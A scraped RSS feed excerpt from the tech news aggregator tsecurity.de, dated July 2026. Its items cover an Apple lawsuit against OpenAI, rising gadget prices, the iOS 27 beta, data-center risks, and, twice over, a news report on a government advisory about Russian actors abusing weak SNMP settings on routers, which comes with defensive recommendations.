<title><![CDATA[Apple’s Trade Secret Lawsuit Is Disrupting OpenAI Hardware Plans]]></title>
<description><![CDATA[Apple recently sued OpenAI over alleged trade secret theft, and the move is already causing major roadblocks for the hardware plans of the ChatGPT maker. According to reports, Apple's ongoing lawsuit against the AI giant is actively hurting OpenAI's ability to hire top talent and build its upcomi...]]></description>
<link>https://tsecurity.de/de/3666781/ios-mac-os/apples-trade-secret-lawsuit-is-disrupting-openai-hardware-plans/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666781/ios-mac-os/apples-trade-secret-lawsuit-is-disrupting-openai-hardware-plans/</guid>
<pubDate>Tue, 14 Jul 2026 05:21:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple recently sued OpenAI over alleged trade secret theft, and the move is already causing major roadblocks for the hardware plans of the ChatGPT maker. According to reports, Apple's ongoing lawsuit against the AI giant is actively hurting OpenAI's ability to hire top talent and build its upcoming hardware. The iPhone maker claims OpenAI coached ex-employees to share unreleased product details, leading to severe fallout across the industry.



The legal battle forces engineers to slow down hardware work



Apple has lost more than 400 employees to OpenAI. The list even includes former design chief Jony Ive. Because OpenAI pulled so many people from the iPhone product design group, Apple had to completely rebuild parts of its internal team. To keep engineers from leaving, it is now offering larger retention bonuses.



The lawsuit claims OpenAI gave new hires a document connected to former iPhone design chief Tang Tan. This document allegedly showed them how to bypass exit security checks. Now, this legal fight is changing how OpenAI hires new staff. People who want to leave Apple might rethink their decision because of the extra attention from corporate security.



Inside OpenAI, the daily routine is also shifting. Former Apple workers are acting much more carefully about what they discuss. Managers are skipping technical questions that might touch on confidential information. Instead of doing real development, engineers are spending time on compliance training and legal reviews for their new artificial intelligence products. Company leaders are also stuck dealing with legal paperwork.



Asian suppliers hesitate to help build new smart devices



The ripple effect reaches far beyond office walls. Hardware requires manufacturers, and Apple holds massive power over consumer electronics suppliers in Asia. A partner company might refuse to work with OpenAI on its upcoming AI gadgets. No manufacturer wants to risk its massive, long-term deals with Apple or get dragged into a messy court battle.



If a judge orders preliminary relief, OpenAI might have to lock away disputed materials and certify its compliance. This would stall its hardware schedule even more. If the court eventually finds that stolen trade secrets actually made it into the new devices, OpenAI would likely have to redesign everything from scratch.



OpenAI still expects to announce its first hardware product this year, with a public release aimed for 2027. It will likely be a basic smart device rather than a direct phone replacement. Ultimately, while OpenAI wants to expand into wearables, overcoming this legal wall will dictate whether its hardware vision ever becomes a reality.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Demand Spikes Prices For iPads And Other Consumer Gadgets]]></title>
<description><![CDATA[If you are planning to buy a new tablet or gaming console soon, you might need to adjust your budget. A massive shift in the tech industry is pushing up the cost of everyday electronics. Data centers are buying up large amounts of memory chips to power new artificial intelligence software.



Thi...]]></description>
<link>https://tsecurity.de/de/3666760/ios-mac-os/ai-demand-spikes-prices-for-ipads-and-other-consumer-gadgets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666760/ios-mac-os/ai-demand-spikes-prices-for-ipads-and-other-consumer-gadgets/</guid>
<pubDate>Tue, 14 Jul 2026 05:08:28 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you are planning to buy a new tablet or gaming console soon, you might need to adjust your budget. A massive shift in the tech industry is pushing up the cost of everyday electronics. Data centers are buying up large amounts of memory chips to power new artificial intelligence software.



This leaves fewer components available for regular consumer devices. As a result, big brands are raising prices on everything from a standard iPad to basic laptops.



Tech brands shift memory supply away from consumer gadgets



The current market crunch comes down to basic supply and demand. Companies making memory chips are redirecting production to meet the massive needs of servers. This high-bandwidth memory is highly profitable, so manufacturers prioritize it over the standard parts used in phones and gaming systems.



Because of this shortage, a company like Apple is facing higher manufacturing costs. It has started passing these expenses directly to buyers. You will notice higher price tags on the latest MacBook models and other devices. A rival brand like Microsoft is doing the same thing to deal with its own supply squeeze.



Experts advise buying refurbished or keeping your current hardware



With prices climbing, industry watchers recommend changing how you shop for electronics. If your current phone or laptop still works well, the best move is to delay upgrading. Keeping a device for an extra year helps you avoid the current pricing spike.



When you absolutely need a replacement, experts suggest looking at the refurbished market. Buying a certified pre-owned iPhone can save you hundreds of dollars while delivering the performance you need.



You should also watch out for spec shrinkflation. To keep prices from looking too high, some brands are putting less memory in their base models. Always check the exact specifications before you buy, especially if you plan to rely on advanced AI features. Paying attention to these details will protect your wallet until the supply chain stabilizes.]]></content:encoded>
</item>
<item>
<title><![CDATA[Governments to enterprises: Improve your router security hygiene]]></title>
<description><![CDATA[Global security agencies say enterprises must clean up their act as Russian government-sponsored attackers exploit weaknesses in routers.



According to a new multinational cybersecurity advisory, cyberattackers continue to exploit inadequately-protected and/or poorly-configured network devices ...]]></description>
<link>https://tsecurity.de/de/3666715/it-security-nachrichten/governments-to-enterprises-improve-your-router-security-hygiene/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666715/it-security-nachrichten/governments-to-enterprises-improve-your-router-security-hygiene/</guid>
<pubDate>Tue, 14 Jul 2026 04:23:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Global security agencies say enterprises must clean up their act as Russian government-sponsored attackers exploit weaknesses in routers.</p>



<p class="wp-block-paragraph">According to a new multinational <a href="https://www.ic3.gov/CSA/2026/260713.pdf" target="_blank" rel="noreferrer noopener">cybersecurity advisory</a>, cyberattackers continue to exploit inadequately-protected and/or poorly-configured network devices via age-old tactics. Threat actors scan for weakened devices, typically routers, allowing them to “opportunistically” compromise critical infrastructure networks, according to the bulletin from 19 federal agencies across North America, the UK, Europe, and Australia.</p>



<p class="wp-block-paragraph">They then transfer configuration files to servers they control. These files, containing plaintext or weakly-encoded information like credentials, or details about the organization’s network, hold most of the potential value, noted <a href="https://www.infotech.com/profiles/seva-ioussoufovitch" target="_blank" rel="noreferrer noopener">Seva Ioussoufovitch</a>, a senior research analyst at Info-Tech Research Group.</p>



<p class="wp-block-paragraph">“It might sound simple, but this tactic has been exploited for well over a decade, and is clearly still effective,” he said.</p>



<h2 class="wp-block-heading">How SNMP attacks work</h2>



<p class="wp-block-paragraph">To begin their attack, state-sponsored cybercriminals send requests via the standard Simple Network Management Protocol (SNMP) framework that supports device-network information exchange, which allows them to scan for weak, insecure devices still using older SNMPv1 or SNMPv2 protocols that accept common or default “community strings” for authentication. These strings are typically shared passwords, with predictable, public defaults that might have been left untouched by admins. Additionally, many of these devices may remain in their basic router configurations.</p>



<p class="wp-block-paragraph">Using spoofed IP addresses, threat actors instruct SNMP agents running on these devices to copy their configurations to a file (typically “config.bkp” or “output.txt”), then transfer that file to virtual private servers (VPSs) that they control. In addition, cybercriminals are exploiting <a href="https://www.csoonline.com/article/4168484/your-refresh-plan-has-a-cve-blind-spot.html" target="_blank">common vulnerabilities and exposures</a> (CVEs) in Cisco devices, as well as in the Cisco’s Smart Install (SMI) tool.</p>



<p class="wp-block-paragraph">Actors have exploited, at the very least, <a href="https://nvd.nist.gov/vuln/detail/cve-2018-0171" target="_blank" rel="noreferrer noopener">CVE-2018-0171</a> (published in 2018) and <a href="https://nvd.nist.gov/vuln/detail/cve-2008-4128" target="_blank" rel="noreferrer noopener">CVE-2008-4128</a> (published in 2008), according to the bulletin. Both of these targeted <a href="https://www.csoonline.com/article/4043721/russian-hackers-exploit-old-cisco-flaw-to-target-global-enterprise-networks.html" target="_blank">Cisco routers</a>, giving remote, unauthenticated attackers the ability to execute arbitrary code, take unauthorized actions, or cause a denial of service (DoS).</p>



<p class="wp-block-paragraph">Notable groups using this method are known to the security community as “Berserk Bear,” “Crouching Yeti,” “Dragonfly,” “Energetic Bear,” “Ghost Blizzard,” and “Static Tundra.” According to the bulletin, the industries most vulnerable to Russian state-sponsored cyber actors include communications, energy, financial services, defense industrial bases, healthcare and public health facilities, and government services and facilities.</p>



<h2 class="wp-block-heading">A set-and-forget approach, even in 2026</h2>



<p class="wp-block-paragraph">The problem with router hygiene is that devices are susceptible to a “confluence of typical enterprise shortcomings” when it comes to operationalizing security, noted Info-Tech’s Ioussoufovitch.</p>



<p class="wp-block-paragraph">“Many organizations still take a set-it-and-forget-it approach to routers, and don’t track them like they would an endpoint,” he said.</p>



<p class="wp-block-paragraph">Compounding this risk is the fact that routers are typically critical to business continuity, which increases the necessity of keeping their security up-to-date. To make things worse, in some cases, it might also be unclear who’s in charge of device security. “Security points to the network team and they’re pointing right back at security,” Ioussoufovitch noted.</p>



<p class="wp-block-paragraph">As well, many organizations continue to rely on legacy hardware that may be unsupported, but that the business is unwilling to replace.</p>



<p class="wp-block-paragraph">Ultimately, Ioussoufovitch said, “network security just doesn’t seem to be receiving the same amount of attention as the usual areas of focus (like endpoints).”</p>



<h2 class="wp-block-heading">Recommendation: Move away from older protocols and devices immediately</h2>



<p class="wp-block-paragraph">Specifically, the agencies urged security teams and network admins to upgrade to SNMPv3, enforce secure passwords, disable Cisco Smart Install, and block SNMP and common file transfer methods “at the firewall.”</p>



<p class="wp-block-paragraph">Enterprises should immediately disable SNMPv1 and SNMPv2, which are “legacy protocols and should no longer be needed on current devices.” In instances where they are still deemed necessary, shift from default settings to grant read-only access (no read-write access).</p>



<p class="wp-block-paragraph">SNMPv3 should be employed with <em>authPriv</em> configured to the “most modern encryption standard,” the bulletin advised. SNMPv3 adds strong authentication and data encryption unavailable in previous versions, and has more securely encoded parameters to authenticate and encrypt data.</p>



<p class="wp-block-paragraph">“Moving to SNMPv3, which offers stronger authentication and encryption, is a clear, actionable step security teams need to prioritize now,” Ioussoufovitch agreed.</p>



<p class="wp-block-paragraph">The government agencies urged enterprises to use strong, unique passwords for local accounts on network devices, and to monitor for unusual credentials that do not match standard naming conventions, or misconfiguration in logs or intrusion detection systems (IDS). Networks should support multi-factor authentication (MFA), and admins should enforce allow lists for management protocols like SNMP.</p>



<p class="wp-block-paragraph">Additionally, enterprises should update network device software, retire end-of-life devices, and disable Cisco Smart Install on all machines once initial configuration is complete, as this introduces serious <a href="https://www.csoonline.com/article/4195710/jurassic-park-cybersecurity-and-the-dangerous-myth-of-control.html" target="_blank">security issues</a> when it inadvertently remains enabled, the agencies said.</p>



<h2 class="wp-block-heading">Network security must improve across the board</h2>



<p class="wp-block-paragraph">The advisory is a signal that enterprises may be underinvesting in network security, noted Ioussoufovitch. Admins and security leaders should be asking these questions:</p>



<ul class="wp-block-list">
<li>Do they have decent network detection and response capabilities in place?</li>



<li>Are they applying analytics and anomaly detection to network traffic patterns?</li>



<li>Have they incorporated micro-segmentation across the enterprise environment to limit risks posed by any individual router?</li>
</ul>



<p class="wp-block-paragraph">“Getting at least some of these proactive measures in place, while taking a more disciplined approach to the tracking and replacement of EOL devices, can help security and network teams finally start making some headway against these types of threats,” said Ioussoufovitch.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security agreed that enterprise networking equipment security must be improved, but said that’s more on the vendors than the critical infrastructure providers. Vendors should be shipping products that are secure by default; customers shouldn’t have to be going back and turning these features on.</p>



<p class="wp-block-paragraph">He added that it would be great to see Salt Typhoon-proof levels of device security and authentication. “Right now, it’s been trivial for them to pwn networking gear,” he said.</p>



<p class="wp-block-paragraph">While the guidance is important and will help, Shipley said, “building better and shipping secure by default would do even more.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.csoonline.com/article/4196447/governments-to-enterprises-improve-your-router-security-hygiene.html" target="_blank">CSOonline</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Governments to enterprises: Improve your router security hygiene]]></title>
<description><![CDATA[Global security agencies say enterprises must clean up their act as Russian government-sponsored attackers exploit weaknesses in routers.



According to a new multinational cybersecurity advisory, cyberattackers continue to exploit inadequately-protected and/or poorly-configured network devices ...]]></description>
<link>https://tsecurity.de/de/3666705/it-security-nachrichten/governments-to-enterprises-improve-your-router-security-hygiene/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666705/it-security-nachrichten/governments-to-enterprises-improve-your-router-security-hygiene/</guid>
<pubDate>Tue, 14 Jul 2026 03:51:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Global security agencies say enterprises must clean up their act as Russian government-sponsored attackers exploit weaknesses in routers.</p>



<p class="wp-block-paragraph">According to a new multinational <a href="https://www.ic3.gov/CSA/2026/260713.pdf" target="_blank" rel="noreferrer noopener">cybersecurity advisory</a>, cyberattackers continue to exploit inadequately-protected and/or poorly-configured network devices via age-old tactics. Threat actors scan for weakened devices, typically routers, allowing them to “opportunistically” compromise critical infrastructure networks, according to the bulletin from 19 federal agencies across North America, the UK, Europe, and Australia.</p>



<p class="wp-block-paragraph">They then transfer configuration files to servers they control. These files, containing plaintext or weakly-encoded information like credentials, or details about the organization’s network, hold most of the potential value, noted <a href="https://www.infotech.com/profiles/seva-ioussoufovitch" target="_blank" rel="noreferrer noopener">Seva Ioussoufovitch</a>, a senior research analyst at Info-Tech Research Group.</p>



<p class="wp-block-paragraph">“It might sound simple, but this tactic has been exploited for well over a decade, and is clearly still effective,” he said.</p>



<h2 class="wp-block-heading">How SNMP attacks work</h2>



<p class="wp-block-paragraph">To begin their attack, state-sponsored cybercriminals send requests via the standard Simple Network Management Protocol (SNMP) framework that supports device-network information exchange, which allows them to scan for weak, insecure devices still using older SNMPv1 or SNMPv2 protocols that accept common or default “community strings” for authentication. These strings are typically shared passwords, with predictable, public defaults that might have been left untouched by admins. Additionally, many of these devices may remain in their basic router configurations.</p>



<p class="wp-block-paragraph">Using spoofed IP addresses, threat actors instruct SNMP agents running on these devices to copy their configurations to a file (typically “config.bkp” or “output.txt”), then transfer that file to virtual private servers (VPSs) that they control. In addition, cybercriminals are exploiting <a href="https://www.csoonline.com/article/4168484/your-refresh-plan-has-a-cve-blind-spot.html" target="_blank">common vulnerabilities and exposures</a> (CVEs) in Cisco devices, as well as in the Cisco’s Smart Install (SMI) tool.</p>



<p class="wp-block-paragraph">Actors have exploited, at the very least, <a href="https://nvd.nist.gov/vuln/detail/cve-2018-0171" target="_blank" rel="noreferrer noopener">CVE-2018-0171</a> (published in 2018) and <a href="https://nvd.nist.gov/vuln/detail/cve-2008-4128" target="_blank" rel="noreferrer noopener">CVE-2008-4128</a> (published in 2008), according to the bulletin. Both of these targeted <a href="https://www.csoonline.com/article/4043721/russian-hackers-exploit-old-cisco-flaw-to-target-global-enterprise-networks.html" target="_blank">Cisco routers</a>, giving remote, unauthenticated attackers the ability to execute arbitrary code, take unauthorized actions, or cause a denial of service (DoS).</p>



<p class="wp-block-paragraph">Notable groups using this method are known to the security community as “Berserk Bear,” “Crouching Yeti,” “Dragonfly,” “Energetic Bear,” “Ghost Blizzard,” and “Static Tundra.” According to the bulletin, the industries most vulnerable to Russian state-sponsored cyber actors include communications, energy, financial services, defense industrial bases, healthcare and public health facilities, and government services and facilities.</p>



<h2 class="wp-block-heading">A set-and-forget approach, even in 2026</h2>



<p class="wp-block-paragraph">The problem with router hygiene is that devices are susceptible to a “confluence of typical enterprise shortcomings” when it comes to operationalizing security, noted Info-Tech’s Ioussoufovitch.</p>



<p class="wp-block-paragraph">“Many organizations still take a set-it-and-forget-it approach to routers, and don’t track them like they would an endpoint,” he said.</p>



<p class="wp-block-paragraph">Compounding this risk is the fact that routers are typically critical to business continuity, which increases the necessity of keeping their security up-to-date. To make things worse, in some cases, it might also be unclear who’s in charge of device security. “Security points to the network team and they’re pointing right back at security,” Ioussoufovitch noted.</p>



<p class="wp-block-paragraph">As well, many organizations continue to rely on legacy hardware that may be unsupported, but that the business is unwilling to replace.</p>



<p class="wp-block-paragraph">Ultimately, Ioussoufovitch said, “network security just doesn’t seem to be receiving the same amount of attention as the usual areas of focus (like endpoints).”</p>



<h2 class="wp-block-heading">Recommendation: Move away from older protocols and devices immediately</h2>



<p class="wp-block-paragraph">Specifically, the agencies urged security teams and network admins to upgrade to SNMPv3, enforce secure passwords, disable Cisco Smart Install, and block SNMP and common file transfer methods “at the firewall.”</p>



<p class="wp-block-paragraph">Enterprises should immediately disable SNMPv1 and SNMPv2, which are “legacy protocols and should no longer be needed on current devices.” In instances where they are still deemed necessary, shift from default settings to grant read-only access (no read-write access).</p>



<p class="wp-block-paragraph">SNMPv3 should be employed with <em>authPriv</em> configured to the “most modern encryption standard,” the bulletin advised. SNMPv3 adds strong authentication and data encryption unavailable in previous versions, and has more securely encoded parameters to authenticate and encrypt data.</p>



<p class="wp-block-paragraph">“Moving to SNMPv3, which offers stronger authentication and encryption, is a clear, actionable step security teams need to prioritize now,” Ioussoufovitch agreed.</p>



<p class="wp-block-paragraph">The government agencies urged enterprises to use strong, unique passwords for local accounts on network devices, and to monitor for unusual credentials that do not match standard naming conventions, or misconfiguration in logs or intrusion detection systems (IDS). Networks should support multi-factor authentication (MFA), and admins should enforce allow lists for management protocols like SNMP.</p>



<p class="wp-block-paragraph">Additionally, enterprises should update network device software, retire end-of-life devices, and disable Cisco Smart Install on all machines once initial configuration is complete, as this introduces serious <a href="https://www.csoonline.com/article/4195710/jurassic-park-cybersecurity-and-the-dangerous-myth-of-control.html" target="_blank">security issues</a> when it inadvertently remains enabled, the agencies said.</p>



<h2 class="wp-block-heading">Network security must improve across the board</h2>



<p class="wp-block-paragraph">The advisory is a signal that enterprises may be underinvesting in network security, noted Ioussoufovitch. Admins and security leaders should be asking these questions:</p>



<ul class="wp-block-list">
<li>Do they have decent network detection and response capabilities in place?</li>



<li>Are they applying analytics and anomaly detection to network traffic patterns?</li>



<li>Have they incorporated micro-segmentation across the enterprise environment to limit risks posed by any individual router?</li>
</ul>



<p class="wp-block-paragraph">“Getting at least some of these proactive measures in place, while taking a more disciplined approach to the tracking and replacement of EOL devices, can help security and network teams finally start making some headway against these types of threats,” said Ioussoufovitch.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security agreed that enterprise networking equipment security must be improved, but said that’s more on the vendors than the critical infrastructure providers. Vendors should be shipping products that are secure by default; customers shouldn’t have to be going back and turning these features on.</p>



<p class="wp-block-paragraph">He added that it would be great to see Salt Typhoon-proof levels of device security and authentication. “Right now, it’s been trivial for them to pwn networking gear,” he said.</p>



<p class="wp-block-paragraph">While the guidance is important and will help, Shipley said, “building better and shipping secure by default would do even more.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[iOS 27 Public Beta Is Now Available: Here’s Everything New]]></title>
<description><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility ...]]></description>
<link>https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666598/ios-mac-os/ios-27-public-beta-is-now-available-heres-everything-new/</guid>
<pubDate>Tue, 14 Jul 2026 01:53:56 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has released the first iOS 27 public beta, giving iPhone users an early look at Siri AI, faster system performance, refined Liquid Glass visuals, and several useful app upgrades. The beta is free to install, although users should expect bugs, battery drain, and occasional app compatibility problems.



How to Install the iOS 27 Public Beta



Back up your iPhone through iCloud or a computer before installing the beta. Using a secondary device is safer because returning to iOS 26 can require erasing the iPhone.




Visit the Apple Beta Software Program website.



Sign in using the Apple Account connected to your iPhone.



Accept the program terms and enroll your account.



Open Settings on your iPhone.



Go to General &gt; Software Update &gt; Beta Updates.



Select iOS 27 Public Beta.



Return to the previous screen and tap Update Now.




Your iPhone must have enough available storage, a stable Wi-Fi connection, and sufficient battery power to complete the installation.



Everything New in the iOS 27 Public Beta




Siri AI: Siri now supports more natural conversations, follow-up questions, personal information searches, onscreen awareness, and actions across supported apps. A dedicated Siri app also stores previous conversations. Siri AI requires an iPhone that supports Apple Intelligence.



Visual Intelligence in Camera: Users can point the camera at real-world information and ask Siri for help. The system can identify details, extract information, create calendar events, and perform tasks such as reading a barcode or analysing a meal.



Faster iPhone performance: Apple has improved app launches, AirDrop transfers, photo processing, keyboard loading, unlocking, Home Screen navigation, and system animations. These improvements also apply to older supported models, including the iPhone 11 series.



Liquid Glass controls: iOS 27 refines the Liquid Glass design introduced with iOS 26. A new slider under Settings &gt; Appearance lets users adjust how clear or tinted the interface appears.



Smarter Safari tools: Safari can automatically group tabs and organize bookmarks by topic. It can also watch webpages for changes and help users create extensions through natural-language instructions.



New Photos editing features: The Photos app includes an improved Clean Up tool for removing larger distractions. Extend can generate content beyond the edges of a photo, while Spatial Reframing lets users adjust the apparent camera angle after taking a picture.



Natural-language Shortcuts: Users can describe an automation in everyday language, and the Shortcuts app will build it. Additional instructions can refine the automation without starting again.



Improved password security: The Passwords app can replace some weak or compromised passwords automatically. It can also manage verification codes and show the replacement process through a Live Activity.



Screen Time redesign: Parents receive a clearer activity dashboard, category-based time allowances, and schedules for school days, evenings, and weekends. Children can request permission before visiting certain websites or contacting new people.



More child safety features: Communication Safety can detect and blur sensitive images. iOS 27 expands these protections to include violent or graphic content.



AirPods custom equalizer: Compatible AirPods gain separate controls for low, mid, and high frequencies, giving users more control over how music and other audio sound.



Messages improvements: Large photos and videos can continue sending in the background without delaying newer messages. Group conversations also handle Tapback notifications more clearly.



Better Photos sharing: Shared Albums support full-resolution media, contributions from Windows and Android devices, keywords, star ratings, and customizable slideshows.



Independent alarm volume: Users can change alarm volume without changing the overall system volume.



Larger Home Screen widgets: New extra-large widgets can take up an entire Home Screen page and show more information at once.



Home app upgrades: The Home app adds improved HomeKit Secure Video reliability and support for compatible 4K security cameras.



Better network switching: iPhones can move between Wi-Fi and cellular data more quickly when the current connection becomes weak.




The iOS 27 public beta will receive more updates before the final version arrives later this year. Anyone testing the software can report bugs through the Feedback Assistant app.



If you’ve already installed the update, let us know your experience in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Weather grows as one of data center growth’s greatest risks]]></title>
<description><![CDATA[AI-driven hyperscale data centers are creating a new generation of risks and challenges that extend well beyond power shortages and chip supply, according to a new report from Zurich North America.



The unprecedented scale, speed and complexity of AI data center construction are exposing the in...]]></description>
<link>https://tsecurity.de/de/3666279/it-security-nachrichten/weather-grows-as-one-of-data-center-growths-greatest-risks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666279/it-security-nachrichten/weather-grows-as-one-of-data-center-growths-greatest-risks/</guid>
<pubDate>Mon, 13 Jul 2026 21:53:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">AI-driven hyperscale data centers are creating a new generation of risks and challenges that extend well beyond power shortages and chip supply, according to a new report from Zurich North America.</p>



<p class="wp-block-paragraph">The unprecedented scale, speed and complexity of AI <a href="https://www.networkworld.com/article/4158559/data-centers-are-moving-inland-away-from-some-traditional-locations.html">data center construction</a> are exposing the industry to new threats previously unknown to the older generation of data centers, ranging from severe weather and energy constraints to insurance capacity, labor shortages and geopolitical disruptions, in its report, “<a href="https://www.zurichna.com/media/news-releases/2026/zurich-shares-firsthand-insights-in-data-center-risks-right-now">Data Center Risks Right Now: Six Critical Questions to Enable a Resilient Buildout.</a>”</p>



<p class="wp-block-paragraph">The report states that hyperscalers are prepared to spend an estimated $710 billion in capital expenditures during 2026, and <a href="https://www.youtube.com/watch?v=OjMlcb1U804">global investment in data centers</a> is projected to top $7 trillion by 2030. New capacity added between 2026 and 2030 is expected to total roughly 100 gigawatts, equivalent to the peak electricity demand of about nine New York Cities.</p>



<p class="wp-block-paragraph">Much of that is because these <a href="https://www.networkworld.com/article/4129982/us-pushes-voluntary-pact-to-curb-ai-data-center-energy-impact.html">new data centers</a> are not like any previous generations of  data center development in that modern AI campuses can span up to 20 buildings, consume as much as 2,000 megawatts of electricity and house billions of dollars’ worth of servers and cooling equipment.</p>



<p class="wp-block-paragraph">In addition, <a href="https://www.zurichna.com/knowledge/articles/2026/06/data-centers-through-the-eyes-of-risk-engineers">insurance providers</a> are struggling to keep pace with the massive growth in projected value of these data centers.  Zurich says the average value of the data centers it insured has jumped from roughly $150 million five years ago to about $3 billion today, while the largest campuses can be measured in the tens of billions of dollars.</p>



<p class="wp-block-paragraph">The report cited six areas of concern, the primary of which is growing: severe weather.   Severe weather has surpassed fire as leading construction threat due to changing geography. Zurich states that 64% of U.S. data center capacity currently under construction is located outside traditional markets such as Northern Virginia, in areas are known for bad weather.</p>



<p class="wp-block-paragraph">They include West Texas, Tennessee, Wisconsin and Ohio, where tornadoes, hailstorms and high winds present new hazards. Zurich says severe weather has become the largest source of losses in its U.S. builders-risk portfolio over the past three years, surpassing fire as the industry’s dominant construction threat. Weather accounts for 32% of losses in Zurich’s data center portfolio, followed by fire and equipment damage.</p>



<p class="wp-block-paragraph">The second issue is compressed construction schedules. Operators are increasingly beginning operating portions of a campus where construction is complete and while construction continues elsewhere. That means welding and other, heavy equipment plus incomplete fire protection coexist with active server halls containing sensitive computing equipment.</p>



<p class="wp-block-paragraph">Beyond construction and to absolutely no surprise, Zurich identifies energy infrastructure as one of the defining challenges facing AI expansion. The report notes that U.S. data center electricity demand increased roughly 22% in a single year and is expected to nearly triple to approximately 134 gigawatts by 2030.</p>



<p class="wp-block-paragraph">Likewise, water availability is becoming equally important as power as AI workloads generate more heat and require increasingly sophisticated cooling systems. The report notes that many operators are deploying closed-loop water recycling systems or shifting toward air cooling where possible in a bid to reduce water consumption.</p>



<p class="wp-block-paragraph">Downtime has become more expensive because so much expensive equipment is involved, even minor operational failures can become multimillion-dollar events.</p>



<p class="wp-block-paragraph">The report also warns that replacement equipment often requires months to arrive, citing industry estimates that switchgear may take up to 85 weeks to replace and generators as long as 100 weeks.</p>



<p class="wp-block-paragraph"><a href="https://www.zurichna.com/knowledge/articles/2026/06/the-human-side-of-data-centers">Workforce shortages</a> have raised operational concerns as the AI construction boom is straining the labor market, and they don’t mean The IT staff to run the place, they need people to build it. Zurich cited a report from <a href="https://www.agc.org/">Associated General Contractors of America</a> that 92% of U.S. construction firms are having difficulty finding qualified workers.</p>



<p class="wp-block-paragraph">The report concludes that geopolitical tensions, regulatory scrutiny and emerging technologies will increasingly influence where and how data centers are built. Among the trends Zurich identifies are growing political concern over electricity prices and water consumption, increased reliance on nuclear energy, interest in integrating future quantum computing systems and even early proposals for orbital data centers supported by solar power.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TV-logging app TV Time is functionally relaunching as parent company pivots to AI]]></title>
<description><![CDATA[Bingers is expected to launch by the end of July as a replacement for TV Time.]]></description>
<link>https://tsecurity.de/de/3666132/it-nachrichten/tv-logging-app-tv-time-is-functionally-relaunching-as-parent-company-pivots-to-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666132/it-nachrichten/tv-logging-app-tv-time-is-functionally-relaunching-as-parent-company-pivots-to-ai/</guid>
<pubDate>Mon, 13 Jul 2026 20:17:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bingers is expected to launch by the end of July as a replacement for TV Time.]]></content:encoded>
</item>
<item>
<title><![CDATA[Philips Hue promises free Bridge Pro replacements after a rogue update bricked its devices — and users are impressed]]></title>
<description><![CDATA[Philips Hue is offering free replacement Hue Bridge Pro devices after they were bricked by a software update.]]></description>
<link>https://tsecurity.de/de/3665223/it-nachrichten/philips-hue-promises-free-bridge-pro-replacements-after-a-rogue-update-bricked-its-devices-and-users-are-impressed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665223/it-nachrichten/philips-hue-promises-free-bridge-pro-replacements-after-a-rogue-update-bricked-its-devices-and-users-are-impressed/</guid>
<pubDate>Mon, 13 Jul 2026 14:33:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Philips Hue is offering free replacement Hue Bridge Pro devices after they were bricked by a software update.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die 5 besten KI-Sichtbarkeits-Tools 2026: Der komplette Vergleich]]></title>
<description><![CDATA[Der Beitrag Die 5 besten KI-Sichtbarkeits-Tools 2026: Der komplette Vergleich erschien zuerst beim Online-Magazin BASIC thinking. Über unseren Newsletter UPDATE startest du jeden Morgen bestens informiert in den Tag.
Wenn deine potenziellen Kunden ChatGPT, Claude oder Perplexity zu deiner Branche...]]></description>
<link>https://tsecurity.de/de/3664547/it-security-nachrichten/die-5-besten-ki-sichtbarkeits-tools-2026-der-komplette-vergleich/</link>
